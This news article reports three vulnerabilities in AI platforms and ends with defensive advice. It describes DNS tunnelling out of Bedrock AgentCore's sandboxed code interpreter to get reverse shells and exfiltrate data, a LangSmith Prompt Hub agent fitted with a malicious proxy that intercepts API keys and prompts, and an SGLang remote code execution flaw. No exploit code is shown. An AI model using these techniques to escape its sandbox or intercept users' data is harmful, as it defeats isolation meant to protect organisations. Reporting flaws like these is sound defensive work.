Critical AI Vulnerabilities in Amazon Bedrock, LangSmith, and SGLang Expose Systems to Data Breaches and Remote Code Execution
Recent cybersecurity research has unveiled significant vulnerabilities in prominent artificial intelligence (AI) platforms, including Amazon Bedrock’s AgentCore Code Interpreter, LangSmith, and SGLang. These flaws could potentially allow attackers to exfiltrate sensitive data and execute remote code, posing substantial risks to organizations utilizing these services.
Amazon Bedrock’s AgentCore Code Interpreter Vulnerability
Amazon Bedrock’s AgentCore Code Interpreter is designed to enable AI agents to execute code within isolated sandbox environments, ensuring that agentic workloads cannot access external systems. However, researchers at BeyondTrust have identified a critical flaw in this sandbox mode that permits outbound Domain Name System (DNS) queries. This loophole can be exploited by attackers to establish command-and-control channels and exfiltrate data, effectively bypassing the intended network isolation.
In a detailed report, BeyondTrust demonstrated how threat actors could set up bidirectional communication channels using DNS queries and responses. This method allows for interactive reverse shells, data exfiltration, and command execution. The vulnerability is particularly concerning because it undermines the network isolation guarantees of sandboxed code interpreters, potentially leading to data breaches and system compromises.
Following responsible disclosure in September 2025, Amazon acknowledged the issue but classified it as intended functionality rather than a defect. The company recommends that customers use Virtual Private Cloud (VPC) mode instead of sandbox mode for complete network isolation. Additionally, Amazon advises implementing DNS firewalls to filter outbound DNS traffic, thereby mitigating potential exploitation.
LangSmith’s Account Takeover Flaw
LangSmith, an observability and evaluation platform for developing and monitoring large language model (LLM) applications, has also been found to have a significant security flaw. Researchers at Miggo Security discovered that the platform’s authentication mechanism could be exploited to gain unauthorized access to user accounts. This vulnerability allows attackers to intercept API keys and user prompts, leading to potential data breaches and unauthorized actions within the platform.
The flaw, codenamed AgentSmith, carries a Common Vulnerability Scoring System (CVSS) score of 8.8 out of 10, indicating a high severity level. The vulnerability was identified in the LangChain Hub, a repository for publicly listed prompts, agents, and models. By adopting an agent containing a pre-configured malicious proxy server uploaded to the Prompt Hub, attackers could discreetly intercept all user communications, including sensitive data.
LangSmith has since patched the vulnerability and recommends that users update their systems to the latest version to mitigate potential risks. Users are also advised to review their account settings and monitor for any unauthorized activities.
SGLang’s Remote Code Execution Vulnerability
SGLang, another AI platform, has been found to have a vulnerability that could allow for remote code execution (RCE). The flaw resides in the platform’s code execution environment, where insufficient input validation permits attackers to execute arbitrary code. This vulnerability poses a significant risk, as it could lead to unauthorized access, data breaches, and system compromises.
Security researchers have demonstrated how an attacker could craft malicious inputs that, when processed by SGLang, execute unintended commands. This exploitation could result in the installation of malware, data exfiltration, or further network penetration.
SGLang has acknowledged the issue and released a security update to address the vulnerability. Users are strongly encouraged to apply the update promptly and review their systems for any signs of compromise.
Mitigation Strategies and Recommendations
To protect against these vulnerabilities, organizations should implement the following strategies:
1. Update and Patch Systems: Ensure that all AI platforms and associated software are updated to the latest versions that include security patches for known vulnerabilities.
2. Implement Network Isolation: Utilize VPC modes and configure network settings to enforce strict isolation, preventing unauthorized access and data exfiltration.
3. Monitor DNS Traffic: Deploy DNS firewalls and monitoring tools to detect and block suspicious DNS queries that could indicate command-and-control communications or data exfiltration attempts.
4. Review IAM Roles and Permissions: Conduct regular audits of Identity and Access Management (IAM) roles to ensure they adhere to the principle of least privilege, minimizing the potential impact of a compromised account.
5. Conduct Security Audits: Regularly perform comprehensive security assessments of AI platforms to identify and remediate potential vulnerabilities before they can be exploited.
By proactively addressing these vulnerabilities and implementing robust security measures, organizations can mitigate the risks associated with AI platform flaws and safeguard their systems and data against potential attacks.